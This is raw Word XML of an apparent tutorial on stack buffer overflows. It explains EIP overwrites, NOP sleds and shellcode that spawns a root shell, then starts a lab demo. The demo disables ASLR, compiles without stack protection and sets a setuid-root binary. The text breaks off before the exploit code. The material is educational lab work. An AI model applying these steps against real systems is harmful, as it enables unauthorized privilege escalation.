          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ESP: Extended Stack Pointer</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>- Points to the top of the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35F42C" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EIP: Extended Instruction Pointer</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>- Return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E51A06" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>How do we Exploit This?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35240A15" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We can feed any memory address within the stack into the EIP. The program will execute instructions at that memory address. We can put our own </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the stack, put the address to the start of the shellcode at the EIP, and the program will execute the shellcode. Shellcode is a collection of operation codes (written in hex) whose goal is to open a root shell instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3A06B" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>The Actual Hack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E0C14" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of returning </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exactly</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where our shellcode starts, we can put no operation (NOP) hex instructions (0x90) into the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3221A0" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Write past array buffer ending.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140C01C" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Find where we want our address to return to (somewhere in the NOP region).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C16A281" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Overwrite return address at EIP with our address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64E868" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Don’t write past EIP!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934D64D" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F440C7" wp14:editId="2F65DF52">
            <wp:extent cx="2133600" cy="3829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3600" cy="3829050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E3B97" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">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247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10CDBF" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB1F394" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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47450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Get on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> system if you want to follow along with this one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA2A6A" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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47450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First, you can download our </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00247450">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>vulnerable program</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00247450">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>shellcode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we’ll be using.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A0073" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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47450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00247450">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>ASLR</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (must be root to do this):</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo "0" &gt; /proc/sys/kernel/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F0FEA62" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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47450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compile disabling buffer protections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>g++ escalate.cpp -o escalate -m32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-stack-protector -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="109F8AB2" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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47450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Give root permissions (must be root to do this - you can try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> escalate</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>u+s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53988C84" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="0024745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47450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Give this file to a user that doesn’t have root permissions. My non-root user is called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this demo. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to double check that the permissions are aligned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E538ED7" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72351C23" wp14:editId="7A855243">
            <wp:extent cx="4845050" cy="228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5050" cy="228600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B990A" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now we can start trying to exploit the program! As reference, here is the source code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4ABA53" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
